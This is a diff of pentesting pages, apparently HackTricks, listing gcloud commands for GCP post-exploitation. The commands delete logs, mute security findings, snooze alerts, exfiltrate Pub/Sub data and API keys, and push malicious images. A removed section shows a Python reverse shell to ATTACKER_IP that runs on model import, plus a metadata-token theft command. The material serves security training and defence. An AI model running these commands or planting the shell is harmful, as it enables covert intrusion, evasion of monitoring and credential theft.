from google.cloud import kms
import base64
@@ -189,8 +205,14 @@ ciphertext = encrypt_symmetric(project_id, location_id, key_ring_id, key_id, pla
print('Ciphertext:', ciphertext)
```
</details>
### `cloudkms.cryptoKeyVersions.useToSign`
<details>
<summary>Sign message with asymmetric key (Python)</summary>
```python
import hashlib
from google.cloud import kms
@@ -225,8 +247,14 @@ signature = sign_asymmetric(project_id, location_id, key_ring_id, key_id, key_ve
print('Signature:', signature)
```
</details>
### `cloudkms.cryptoKeyVersions.useToVerify`
<details>
<summary>Verify signature with asymmetric key (Python)</summary>
```python
from google.cloud import kms
import hashlib
@@ -254,6 +282,8 @@ verified = verify_asymmetric_signature(project_id, location_id, key_ring_id, key
print('Verified:', verified)
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -26,6 +26,10 @@ In [https://console.cloud.google.com/iam-admin/audit/allservices](https://consol
### Read logs - `logging.logEntries.list`
<details>
<summary>Read log entries</summary>
```bash
# Read logs
gcloud logging read "logName=projects/your-project-id/logs/log-id" --limit=10 --format=json
@@ -36,79 +40,145 @@ gcloud logging read "timestamp >= \"2023-01-01T00:00:00Z\"" --limit=10 --format=
# Use these options to indicate a different bucket or view to use: --bucket=_Required --view=_Default
```
</details>
### `logging.logs.delete`
<details>
<summary>Delete log entries</summary>
```bash
# Delete all entries from a log in the _Default log bucket - logging.logs.delete
gcloud logging logs delete <log-name>
```
</details>
### Write logs - `logging.logEntries.create`
<details>
<summary>Write log entry</summary>
```bash
# Write a log entry to try to disrupt some system
gcloud logging write LOG_NAME "A deceptive log entry" --severity=ERROR
```
</details>
### `logging.buckets.update`
<details>
<summary>Update log bucket retention</summary>
```bash
# Set retention period to 1 day (_Required has a fixed one of 400days)
gcloud logging buckets update bucketlog --location=<location> --description="New description" --retention-days=1
```
</details>
### `logging.buckets.delete`
<details>
<summary>Delete log bucket</summary>
```bash
# Delete log bucket
gcloud logging buckets delete BUCKET_NAME --location=<location>
```
</details>
### `logging.links.delete`
<details>
<summary>Delete log link</summary>
```bash
# Delete link
gcloud logging links delete <link-id> --bucket <bucket> --location <location>
```
</details>
### `logging.views.delete`
<details>
<summary>Delete logging view</summary>
```bash
# Delete a logging view to remove access to anyone using it
gcloud logging views delete <view-id> --bucket=<bucket> --location=global
```
</details>
### `logging.views.update`
<details>
<summary>Update logging view to hide data</summary>
```bash
# Update a logging view to hide data
gcloud logging views update <view-id> --log-filter="resource.type=gce_instance" --bucket=<bucket> --location=global --description="New description for the log view"
```
</details>
### `logging.logMetrics.update`
<details>
<summary>Update log-based metrics</summary>
```bash
# Update log based metrics - logging.logMetrics.update
gcloud logging metrics update <metric-name> --description="Changed metric description" --log-filter="severity>CRITICAL" --project=PROJECT_ID
```
</details>
### `logging.logMetrics.delete`
<details>
<summary>Delete log-based metrics</summary>
```bash
# Delete log based metrics - logging.logMetrics.delete
gcloud logging metrics delete <metric-name>
```
</details>
### `logging.sinks.delete`
<details>
<summary>Delete log sink</summary>
```bash
# Delete sink - logging.sinks.delete
gcloud logging sinks delete <sink-name>
```
</details>
### `logging.sinks.update`
<details>
<summary>Update/disrupt log sink</summary>
```bash
# Disable sink - logging.sinks.update
gcloud logging sinks update <sink-name> --disabled
@@ -130,6 +200,8 @@ gcloud logging sinks update SINK_NAME --use-partitioned-tables
gcloud logging sinks update SINK_NAME --no-use-partitioned-tables
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -20,14 +20,24 @@ gcp-logging-post-exploitation.md
Delete an alert policy:
<details>
<summary>Delete alert policy</summary>
```bash
gcloud alpha monitoring policies delete <policy>
```
</details>
### `monitoring.alertPolicies.update`
Disrupt an alert policy:
<details>
<summary>Disrupt alert policy</summary>
```bash
# Disable policy
gcloud alpha monitoring policies update <alert-policy> --no-enabled
@@ -43,10 +53,16 @@ gcloud alpha monitoring policies update <alert-policy> --policy="{ 'displayName'
# or use --policy-from-file <policy-file>
```
</details>
### `monitoring.dashboards.update`
Modify a dashboard to disrupt it:
<details>
<summary>Disrupt dashboard</summary>
```bash
# Disrupt dashboard
gcloud monitoring dashboards update <dashboard> --config='''
@@ -59,19 +75,31 @@ gcloud monitoring dashboards update <dashboard> --config='''
'''
```
</details>
### `monitoring.dashboards.delete`
Delete a dashboard:
<details>
<summary>Delete dashboard</summary>
```bash
# Delete dashboard
gcloud monitoring dashboards delete <dashboard>
```
</details>
### `monitoring.snoozes.create`
Prevent policies from generating alerts by creating a snoozer:
<details>
<summary>Create snoozer to stop alerts</summary>
```bash
# Stop alerts by creating a snoozer
gcloud monitoring snoozes create --display-name="Maintenance Week" \
@@ -80,10 +108,16 @@ gcloud monitoring snoozes create --display-name="Maintenance Week" \
--end-time="2023-03-07T23:59:59.5-0500"
```
</details>
### `monitoring.snoozes.update`
Update the timing of a snoozer to prevent alerts from being created when the attacker is interested:
<details>
<summary>Update snoozer timing</summary>
```bash
# Modify the timing of a snooze
gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END_TIME
@@ -92,25 +126,39 @@ gcloud monitoring snoozes update <snooze> --start-time=START_TIME --end-time=END
gcloud monitoring snoozes update <snooze> --snooze-from-file=<file>
```
</details>
### `monitoring.notificationChannels.delete`
Delete a configured channel:
<details>
<summary>Delete notification channel</summary>
```bash
# Delete channel
gcloud alpha monitoring channels delete <channel>
```
</details>
### `monitoring.notificationChannels.update`
Update labels of a channel to disrupt it:
<details>
<summary>Update notification channel labels</summary>
```bash
# Delete or update labels, for example email channels have the email indicated here
gcloud alpha monitoring channels update CHANNEL_ID --clear-channel-labels
gcloud alpha monitoring channels update CHANNEL_ID --update-channel-labels=email_address=attacker@example.com
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,28 +14,46 @@ For more information about Pub/Sub check the following page:
Publish a message in a topic, useful to **send unexpected data** and trigger unexpected functionalities or exploit vulnerabilities:
<details>
<summary>Publish message to topic</summary>
```bash
# Publish a message in a topic
gcloud pubsub topics publish <topic_name> --message "Hello!"
```
</details>
### `pubsub.topics.detachSubscription`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.
<details>
<summary>Detach subscription from topic</summary>
```bash
gcloud pubsub topics detach-subscription <FULL SUBSCRIPTION NAME>
```
</details>
### `pubsub.topics.delete`
Useful to prevent a subscription from receiving messages, maybe to avoid detection.\
It's possible to delete a topic even with subscriptions attached to it.
<details>
<summary>Delete topic</summary>
```bash
gcloud pubsub topics delete <TOPIC NAME>
```
</details>
### `pubsub.topics.update`
Use this permission to update some setting of the topic to disrupt it, like `--clear-schema-settings`, `--message-retention-duration`, `--message-storage-policy-allowed-regions`, `--schema`, `--schema-project`, `--topic-encryption-key`...
@@ -48,13 +66,23 @@ Give yourself permission to perform any of the previous attacks.
Get all the messages in a web server:
<details>
<summary>Create push subscription to receive messages</summary>
```bash
# Crete push subscription and recieve all the messages instantly in your web server
gcloud pubsub subscriptions create <subscription name> --topic <topic name> --push-endpoint https://<URL to push to>
```
</details>
Create a subscription and use it to **pull messages**:
<details>
<summary>Create pull subscription and retrieve messages</summary>
```bash
# This will retrive a non ACKed message (and won't ACK it)
gcloud pubsub subscriptions create <subscription name> --topic <topic_name>
@@ -64,22 +92,36 @@ gcloud pubsub subscriptions pull <FULL SUBSCRIPTION NAME>
## This command will wait for a message to be posted
```
</details>
### `pubsub.subscriptions.delete`
**Delete a subscription** could be useful to disrupt a log processing system or something similar:
<details>
<summary>Delete subscription</summary>
```bash
gcloud pubsub subscriptions delete <FULL SUBSCRIPTION NAME>
```
</details>
### `pubsub.subscriptions.update`
Use this permission to update some setting so messages are stored in a place you can access (URL, Big Query table, Bucket) or just to disrupt it.
<details>
<summary>Update subscription endpoint</summary>
```bash
gcloud pubsub subscriptions update --push-endpoint <your URL> <subscription-name>
```
</details>
### `pubsub.subscriptions.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
@@ -89,6 +131,10 @@ Give yourself the permissions needed to perform any of the previously commented
Attack a schema to a topic so the messages doesn't fulfil it and therefore the topic is disrupted.\
If there aren't any schemas you might need to create one.
<details>
<summary>Create schema file and attach to topic</summary>
```json:schema.json
{
"namespace": "com.example",
@@ -114,14 +160,22 @@ gcloud pubsub topics update projects/<project-name>/topics/<topic-id> \
--message-encoding=json
```
</details>
### `pubsub.schemas.delete`
This might look like deleting a schema you will be able to send messages that doesn't fulfil with the schema. However, as the schema will be deleted no message will actually enter inside the topic. So this is **USELESS**:
<details>
<summary>Delete schema (not useful)</summary>
```bash
gcloud pubsub schemas delete <SCHEMA NAME>
```
</details>
### `pubsub.schemas.setIamPolicy`
Give yourself the permissions needed to perform any of the previously commented attacks.
@@ -130,6 +184,10 @@ Give yourself the permissions needed to perform any of the previously commented
This is will create a snapshot of all the unACKed messages and put them back to the subscription. Not very useful for an attacker but here it's:
<details>
<summary>Create snapshot and seek to it</summary>
```bash
gcloud pubsub snapshots create YOUR_SNAPSHOT_NAME \
--subscription=YOUR_SUBSCRIPTION_NAME
@@ -137,6 +195,8 @@ gcloud pubsub subscriptions seek YOUR_SUBSCRIPTION_NAME \
--snapshot=YOUR_SNAPSHOT_NAME
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,11 +14,17 @@ For more information about Secret Manager check:
This give you access to read the secrets from the secret manager and maybe this could help to escalate privielegs (depending on which information is sotred inside the secret):
<details>
<summary>Access secret version</summary>
```bash
# Get clear-text of version 1 of secret: "<secret name>"
gcloud secrets versions access 1 --secret="<secret_name>"
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,47 +14,77 @@ For more information check:
Prevent generation of findings that could detect an attacker by creating a `muteconfig`:
<details>
<summary>Create Muteconfig</summary>
```bash
# Create Muteconfig
gcloud scc muteconfigs create my-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
</details>
### `securitycenter.muteconfigs.update`
Prevent generation of findings that could detect an attacker by updating a `muteconfig`:
<details>
<summary>Update Muteconfig</summary>
```bash
# Update Muteconfig
gcloud scc muteconfigs update my-test-mute-config --organization=123 --description="This is a test mute config" --filter="category=\"XSS_SCRIPTING\""
```
</details>
### `securitycenter.findings.bulkMuteUpdate`
Mute findings based on a filer:
<details>
<summary>Bulk mute based on filter</summary>
```bash
# Mute based on a filter
gcloud scc findings bulk-mute --organization=929851756715 --filter="category=\"XSS_SCRIPTING\""
```
</details>
A muted finding won't appear in the SCC dashboard and reports.
### `securitycenter.findings.setMute`
Mute findings based on source, findings...
<details>
<summary>Set finding as muted</summary>
```bash
gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
gcloud scc findings set-mute 789 --organization=organizations/123 --source=456 --mute=MUTED
```
</details>
### `securitycenter.findings.update`
Update a finding to indicate erroneous information:
<details>
<summary>Update finding state</summary>
```bash
gcloud scc findings update `myFinding` --organization=123456 --source=5678 --state=INACTIVE
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,6 +14,10 @@ For more information about CLoud Storage check this page:
It's possible to give external users (logged in GCP or not) access to buckets content. However, by default bucket will have disabled the option to expose publicly a bucket:
<details>
<summary>Make bucket/objects public</summary>
```bash
# Disable public prevention
gcloud storage buckets update gs://BUCKET_NAME --no-public-access-prevention
@@ -27,6 +31,8 @@ gcloud storage buckets update gs://BUCKET_NAME --add-acl-grant=entity=AllUsers,r
gcloud storage objects update gs://BUCKET_NAME/OBJECT_NAME --add-acl-grant=entity=AllUsers,role=READER
```
</details>
If you try to give **ACLs to a bucket with disabled ACLs** you will find this error: `ERROR: HTTPError 400: Cannot use ACL API to update bucket policy when uniform bucket-level access is enabled. Read more at https://cloud.google.com/storage/docs/uniform-bucket-level-access`
To access open buckets via browser, access the URL `https://<bucket_name>.storage.googleapis.com/` or `https://<bucket_name>.storage.googleapis.com/<object_name>`

View File

@@ -1,123 +0,0 @@
# GCP - Vertex AI Post-Exploitation via Hugging Face Model Namespace Reuse
{{#include ../../../banners/hacktricks-training.md}}
## Scenario
- Vertex AI Model Garden allows direct deployment of many Hugging Face (HF) models.
- HF model identifiers are Author/ModelName. If an author/org on HF is deleted, the same author name can be re-registered by anyone. Attackers can then create a repo with the same ModelName at the legacy path.
- Pipelines, SDKs, or cloud catalogs that fetch by name only (no pinning/integrity) will pull the attacker-controlled repo. When the model is deployed, loader code from that repo can execute inside the Vertex AI endpoint container, yielding RCE with the endpoints permissions.
Two common takeover cases on HF:
- Ownership deletion: Old path 404 until someone re-registers the author and publishes the same ModelName.
- Ownership transfer: HF issues 307 redirects from old Author/ModelName to the new author. If the old author is later deleted and re-registered by an attacker, the redirect chain is broken and the attackers repo serves at the legacy path.
## Identifying Reusable Namespaces (HF)
- Old author deleted: the page for the author returns 404; model path may return 404 until takeover.
- Transferred models: the old model path issues 307 to the new owner while the old author exists. If the old author is later deleted and re-registered, the legacy path will resolve to the attackers repo.
Quick checks with curl:
```bash
# Check author/org existence
curl -I https://huggingface.co/<Author>
# 200 = exists, 404 = deleted/available
# Check old model path behavior
curl -I https://huggingface.co/<Author>/<ModelName>
# 307 = redirect to new owner (transfer case)
# 404 = missing (deletion case) until someone re-registers
```
## End-to-end Attack Flow against Vertex AI
1) Discover reusable model namespaces that Model Garden lists as deployable:
- Find HF models in Vertex AI Model Garden that still show as “verified deployable”.
- Verify on HF if the original author is deleted or if the model was transferred and the old author was later removed.
2) Re-register the deleted author on HF and recreate the same ModelName.
3) Publish a malicious repo. Include code that executes on model load. Examples that commonly execute during HF model load:
- Side effects in __init__.py of the repo
- Custom modeling_*.py or processing code referenced by config/auto_map
- Code paths that require trust_remote_code=True in Transformers pipelines
4) A Vertex AI deployment of the legacy Author/ModelName now pulls the attacker repo. The loader executes inside the Vertex AI endpoint container.
5) Payload establishes access from the endpoint environment (RCE) with the endpoints permissions.
Example payload fragment executed on import (for demonstration only):
```python
# Place in __init__.py or a module imported by the model loader
import os, socket, subprocess, threading
def _rs(host, port):
s = socket.socket(); s.connect((host, port))
for fd in (0,1,2):
try:
os.dup2(s.fileno(), fd)
except Exception:
pass
subprocess.call(["/bin/sh","-i"]) # Or python -c exec ...
if os.environ.get("VTX_AI","1") == "1":
threading.Thread(target=_rs, args=("ATTACKER_IP", 4444), daemon=True).start()
```
Notes
- Real-world loaders vary. Many Vertex AI HF integrations clone and import repo modules referenced by the models config (e.g., auto_map), which can trigger code execution. Some uses require trust_remote_code=True.
- The endpoint typically runs in a dedicated container with limited scope, but it is a valid initial foothold for data access and lateral movement in GCP.
## Post-Exploitation Tips (Vertex AI Endpoint)
Once code is running inside the endpoint container, consider:
- Enumerating environment variables and metadata for credentials/tokens
- Accessing attached storage or mounted model artifacts
- Interacting with Google APIs via service account identity (Document AI, Storage, Pub/Sub, etc.)
- Persistence in the model artifact if the platform re-pulls the repo
Enumerate instance metadata if accessible (container dependent):
```bash
curl -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
```
## Defensive Guidance for Vertex AI Users
- Pin models by commit in HF loaders to prevent silent replacement:
```python
from transformers import AutoModel
m = AutoModel.from_pretrained("Author/ModelName", revision="<COMMIT_HASH>")
```
- Mirror vetted HF models into a trusted internal artifact store/registry and deploy from there.
- Continuously scan codebases and configs for hard-coded Author/ModelName that are deleted/transferred; update to new namespaces or pin by commit.
- In Model Garden, verify model provenance and author existence before deployment.
## Recognition Heuristics (HTTP)
- Deleted author: author page 404; legacy model path 404 until takeover.
- Transferred model: legacy path 307 to new author while old author exists; if old author later deleted and re-registered, legacy path serves attacker content.
```bash
curl -I https://huggingface.co/<OldAuthor>/<ModelName> | egrep "^HTTP|^location"
```
## Cross-References
- See broader methodology and supply-chain notes:
{{#ref}}
../../pentesting-cloud-methodology.md
{{#endref}}
## References
- [Model Namespace Reuse: An AI Supply-Chain Attack Exploiting Model Name Trust (Unit 42)](https://unit42.paloaltonetworks.com/model-namespace-reuse/)
- [Hugging Face: Renaming or transferring a repo](https://huggingface.co/docs/hub/repositories-settings#renaming-or-transferring-a-repo)
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -28,12 +28,15 @@ As you might not know which APIs are enabled in the project or the restrictions
This permission allows to **create an API key**:
<details>
<summary>Create an API key using gcloud</summary>
```bash
gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"etag":"W/\"HOhA[...]=\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
@@ -41,6 +44,8 @@ Operation [operations/akmf.p7-[...]9] complete. Result: {
}
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/b-apikeys.keys.create.sh).
> [!CAUTION]
@@ -50,23 +55,33 @@ You can find a script to automate the [**creation, exploit and cleaning of a vul
These permissions allows **list and get all the apiKeys and get the Key**:
<details>
<summary>List and retrieve all API keys</summary>
```bash
for key in $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done
```
</details>
You can find a script to automate the [**creation, exploit and cleaning of a vuln environment here**](https://github.com/carlospolop/gcp_privesc_scripts/blob/main/tests/c-apikeys.keys.getKeyString.sh).
### `apikeys.keys.undelete` , `apikeys.keys.list` <a href="#serviceusage.apikeys.regenerateapikeys.keys.list" id="serviceusage.apikeys.regenerateapikeys.keys.list"></a>
These permissions allow you to **list and regenerate deleted api keys**. The **API key is given in the output** after the **undelete** is done:
<details>
<summary>List and undelete API keys</summary>
```bash
gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>
```
</details>
### Create Internal OAuth Application to phish other workers
Check the following page to learn how to do this, although this action belongs to the service **`clientauthconfig`** [according to the docs](https://cloud.google.com/iap/docs/programmatic-oauth-clients#before-you-begin):

View File

@@ -19,11 +19,16 @@ You can find python code examples in [https://github.com/GoogleCloudPlatform/pyt
By default, the name of the App service is going to be **`default`**, and there can be only 1 instance with the same name.\
To change it and create a second App, in **`app.yaml`**, change the value of the root key to something like **`service: my-second-app`**
<details>
<summary>Deploy App Engine application</summary>
```bash
cd python-docs-samples/appengine/flexible/hello_world
gcloud app deploy #Upload and start application inside the folder
```
</details>
Give it at least 10-15min, if it doesn't work call **deploy another of times** and wait some minutes.
> [!NOTE]
@@ -35,6 +40,9 @@ The URL of the application is something like `https://<proj-name>.oa.r.appspot.c
You might have enough permissions to update an AppEngine but not to create a new one. In that case this is how you could update the current App Engine:
<details>
<summary>Update existing App Engine application</summary>
```bash
# Find the code of the App Engine in the buckets
gsutil ls
@@ -66,28 +74,45 @@ gcloud app deploy
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
```
</details>
If you have **already compromised a AppEngine** and you have the permission **`appengine.applications.update`** and **actAs** over the service account to use you could modify the service account used by AppEngine with:
<details>
<summary>Update App Engine service account</summary>
```bash
gcloud app update --service-account=<sa>@$PROJECT_ID.iam.gserviceaccount.com
```
</details>
### `appengine.instances.enableDebug`, `appengine.instances.get`, `appengine.instances.list`, `appengine.operations.get`, `appengine.services.get`, `appengine.services.list`, `appengine.versions.get`, `appengine.versions.list`, `compute.projects.get`
With these permissions, it's possible to **login via ssh in App Engine instances** of type **flexible** (not standard). Some of the **`list`** and **`get`** permissions **could not be really needed**.
<details>
<summary>SSH into App Engine instance</summary>
```bash
gcloud app instances ssh --service <app-name> --version <version-id> <ID>
```
</details>
### `appengine.applications.update`, `appengine.operations.get`
I think this just change the background SA google will use to setup the applications, so I don't think you can abuse this to steal the service account.
<details>
<summary>Update application service account</summary>
```bash
gcloud app update --service-account=<sa_email>
```
</details>
### `appengine.versions.getFileContents`, `appengine.versions.update`
Not sure how to use these permissions or if they are useful (note that when you change the code a new version is created so I don't know if you can just update the code or the IAM role of one, but I guess you should be able to, maybe changing the code inside the bucket??).

View File

@@ -14,6 +14,9 @@ For more information about Artifact Registry check:
With this permission an attacker could upload new versions of the artifacts with malicious code like Docker images:
<details>
<summary>Upload Docker image to Artifact Registry</summary>
```bash
# Configure docker to use gcloud to authenticate with Artifact Registry
gcloud auth configure-docker <location>-docker.pkg.dev
@@ -25,6 +28,8 @@ docker tag <local-img-name>:<local-tag> <location>-docker.pkg.dev/<proj-name>/<r
docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
```
</details>
> [!CAUTION]
> It was checked that it's **possible to upload a new malicious docker** image with the same name and tag as the one already present, so the **old one will lose the tag** and next time that image with that tag is **downloaded the malicious one** will be downloaded.
@@ -40,6 +45,9 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
- Inside this directory, create another directory with your package name, e.g., `hello_world`.
- Inside your package directory, create an `__init__.py` file. This file can be empty or can contain initializations for your package.
<details>
<summary>Create project structure</summary>
```bash
mkdir hello_world_library
cd hello_world_library
@@ -47,22 +55,32 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
touch hello_world/__init__.py
```
</details>
2. **Write your library code**:
- Inside the `hello_world` directory, create a new Python file for your module, e.g., `greet.py`.
- Write your "Hello, World!" function:
<details>
<summary>Create library module</summary>
```python
# hello_world/greet.py
def say_hello():
return "Hello, World!"
```
</details>
3. **Create a `setup.py` file**:
- In the root of your `hello_world_library` directory, create a `setup.py` file.
- This file contains metadata about your library and tells Python how to install it.
<details>
<summary>Create setup.py file</summary>
```python
# setup.py
from setuptools import setup, find_packages
@@ -77,40 +95,60 @@ docker push <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
)
```
</details>
**Now, lets upload the library:**
1. **Build your package**:
- From the root of your `hello_world_library` directory, run:
<details>
<summary>Build Python package</summary>
```sh
python3 setup.py sdist bdist_wheel
```
</details>
2. **Configure authentication for twine** (used to upload your package):
- Ensure you have `twine` installed (`pip install twine`).
- Use `gcloud` to configure credentials:
````
<details>
<summary>Upload package with twine</summary>
```sh
twine upload --username 'oauth2accesstoken' --password "$(gcloud auth print-access-token)" --repository-url https://<location>-python.pkg.dev/<project-id>/<repo-name>/ dist/*
```
````
</details>
3. **Clean the build**
<details>
<summary>Clean build artifacts</summary>
```bash
rm -rf dist build hello_world.egg-info
```
</details>
</details>
> [!CAUTION]
> It's not possible to upload a python library with the same version as the one already present, but it's possible to upload **greater versions** (or add an extra **`.0` at the end** of the version if that works -not in python though-), or to **delete the last version an upload a new one with** (needed `artifactregistry.versions.delete)`**:**
>
> <details>
> <summary>Delete artifact version</summary>
>
> ```sh
> gcloud artifacts versions delete <version> --repository=<repo-name> --location=<location> --package=<lib-name>
> ```
>
> </details>
### `artifactregistry.repositories.downloadArtifacts`
@@ -118,6 +156,9 @@ With this permission you can **download artifacts** and search for **sensitive i
Download a **Docker** image:
<details>
<summary>Download Docker image from Artifact Registry</summary>
```sh
# Configure docker to use gcloud to authenticate with Artifact Registry
gcloud auth configure-docker <location>-docker.pkg.dev
@@ -126,12 +167,19 @@ gcloud auth configure-docker <location>-docker.pkg.dev
docker pull <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
```
</details>
Download a **python** library:
<details>
<summary>Download Python library from Artifact Registry</summary>
```bash
pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth print-access-token)@<location>-python.pkg.dev/<project-id>/<repo-name>/simple/" --trusted-host <location>-python.pkg.dev --no-cache-dir
```
</details>
- What happens if a remote and a standard registries are mixed in a virtual one and a package exists in both? Check this page:
{{#ref}}
@@ -142,19 +190,29 @@ pip install <lib-name> --index-url "https://oauth2accesstoken:$(gcloud auth prin
Delete artifacts from the registry, like docker images:
<details>
<summary>Delete Docker image from Artifact Registry</summary>
```bash
# Delete a docker image
gcloud artifacts docker images delete <location>-docker.pkg.dev/<proj-name>/<repo-name>/<img-name>:<tag>
```
</details>
### `artifactregistry.repositories.delete`
Detele a full repository (even if it has content):
<details>
<summary>Delete Artifact Registry repository</summary>
```
gcloud artifacts repositories delete <repo-name> --location=<location>
```
</details>
### `artifactregistry.repositories.setIamPolicy`
An attacker with this permission could give himself permissions to perform some of the previously mentioned repository attacks.

View File

@@ -14,6 +14,9 @@ Basic information:
It's possible to create a batch job, get a reverse shell and exfiltrate the metadata token of the SA (compute SA by default).
<details>
<summary>Create Batch job with reverse shell</summary>
```bash
gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
{
@@ -55,6 +58,8 @@ gcloud beta batch jobs submit job-lxo3b2ub --location us-east1 --config - <<EOD
EOD
```
</details>
{{#include ../../../banners/hacktricks-training.md}}

View File

@@ -14,24 +14,37 @@ For more information about BigQuery check:
Reading the information stored inside the a BigQuery table it might be possible to find s**ensitive information**. To access the info the permission needed is **`bigquery.tables.get`** , **`bigquery.jobs.create`** and **`bigquery.tables.getData`**:
<details>
<summary>Read BigQuery table data</summary>
```bash
bq head <dataset>.<table>
bq query --nouse_legacy_sql 'SELECT * FROM `<proj>.<dataset>.<table-name>` LIMIT 1000'
```
</details>
### Export data
This is another way to access the data. **Export it to a cloud storage bucket** and the **download the files** with the information.\
To perform this action the following permissions are needed: **`bigquery.tables.export`**, **`bigquery.jobs.create`** and **`storage.objects.create`**.
<details>
<summary>Export BigQuery table to Cloud Storage</summary>
```bash
bq extract <dataset>.<table> "gs://<bucket>/table*.csv"
```
</details>
### Insert data
It might be possible to **introduce certain trusted data** in a Bigquery table to abuse a **vulnerability in some other place.** This can be easily done with the permissions **`bigquery.tables.get`** , **`bigquery.tables.updateData`** and **`bigquery.jobs.create`**:
<details>
<summary>Insert data into BigQuery table</summary>
```bash
# Via query
bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank, refresh_date, dma_name, dma_id, term, week, score) VALUES (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2019-10-13", 62), (22, "2023-12-28", "Baltimore MD", 512, "Ms", "2020-05-24", 67)'
@@ -40,10 +53,15 @@ bq query --nouse_legacy_sql 'INSERT INTO `<proj>.<dataset>.<table-name>` (rank,
bq insert dataset.table /tmp/mydata.json
```
</details>
### `bigquery.datasets.setIamPolicy`
An attacker could abuse this privilege to **give himself further permissions** over a BigQuery dataset:
<details>
<summary>Set IAM policy on BigQuery dataset</summary>
```bash
# For this you also need bigquery.tables.getIamPolicy
bq add-iam-policy-binding \
@@ -54,10 +72,15 @@ bq add-iam-policy-binding \
# use the set-iam-policy if you don't have bigquery.tables.getIamPolicy
```
</details>
### `bigquery.datasets.update`, (`bigquery.datasets.get`)
Just this permission allows to **update your access over a BigQuery dataset by modifying the ACLs** that indicate who can access it:
<details>
<summary>Update BigQuery dataset ACLs</summary>
```bash
# Download current permissions, reqires bigquery.datasets.get
bq show --format=prettyjson <proj>:<dataset> > acl.json
@@ -67,10 +90,15 @@ bq update --source acl.json <proj>:<dataset>
bq head $PROJECT_ID:<dataset>.<table>
```
</details>
### `bigquery.tables.setIamPolicy`
An attacker could abuse this privilege to **give himself further permissions** over a BigQuery table:
<details>
<summary>Set IAM policy on BigQuery table</summary>
```bash
# For this you also need bigquery.tables.setIamPolicy
bq add-iam-policy-binding \
@@ -81,17 +109,27 @@ bq add-iam-policy-binding \
# use the set-iam-policy if you don't have bigquery.tables.setIamPolicy
```
</details>
### `bigquery.rowAccessPolicies.update`, `bigquery.rowAccessPolicies.setIamPolicy`, `bigquery.tables.getData`, `bigquery.jobs.create`
According to the docs, with the mention permissions it's possible to **update a row policy.**\
However, **using the cli `bq`** you need some more: **`bigquery.rowAccessPolicies.create`**, **`bigquery.tables.get`**.
<details>
<summary>Create or replace row access policy</summary>
```bash
bq query --nouse_legacy_sql 'CREATE OR REPLACE ROW ACCESS POLICY <filter_id> ON `<proj>.<dataset-name>.<table-name>` GRANT TO ("<user:user@email.xyz>") FILTER USING (term = "Cfba");' # A example filter was used
```
</details>
It's possible to find the filter ID in the output of the row policies enumeration. Example:
<details>
<summary>List row access policies</summary>
```bash
bq ls --row_access_policies <proj>:<dataset>.<table>
@@ -100,8 +138,13 @@ It's possible to find the filter ID in the output of the row policies enumeratio
apac_filter term = "Cfba" user:asd@hacktricks.xyz 21 Jan 23:32:09 21 Jan 23:32:09
```
</details>
If you have **`bigquery.rowAccessPolicies.delete`** instead of `bigquery.rowAccessPolicies.update` you could also just delete the policy:
<details>
<summary>Delete row access policies</summary>
```bash
# Remove one
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<dataset-name>.<table-name>`;'
@@ -110,6 +153,8 @@ bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICY <policy_id> ON `<proj>.<
bq query --nouse_legacy_sql 'DROP ALL ROW ACCESS POLICIES ON `<proj>.<dataset-name>.<table-name>`;'
```
</details>
> [!CAUTION]
> Another potential option to bypass row access policies would be to just change the value of the restricted data. If you can only see when `term` is `Cfba`, just modify all the records of the table to have `term = "Cfba"`. However this is prevented by bigquery.

View File

@@ -16,12 +16,16 @@ For more information about Bigtable check:
Owning the instance IAM policy lets you grant yourself **`roles/bigtable.admin`** (or any custom role) which cascades to every cluster, table, backup and authorized view in the instance.
<details><summary>Grant yourself bigtable.admin role on instance</summary>
```bash
gcloud bigtable instances add-iam-policy-binding <instance-id> \
--member='user:<attacker@example.com>' \
--role='roles/bigtable.admin'
```
</details>
> [!TIP]
> If you cannot list the existing bindings, craft a fresh policy document and push it with `gcloud bigtable instances set-iam-policy` as long as you keep yourself on it.
@@ -33,6 +37,8 @@ After having this permission check in the [**Bigtable Post Exploitation section*
Instance policies can be locked down while individual tables are delegated. If you can edit the table IAM you can **promote yourself to owner of the target dataset** without touching other workloads.
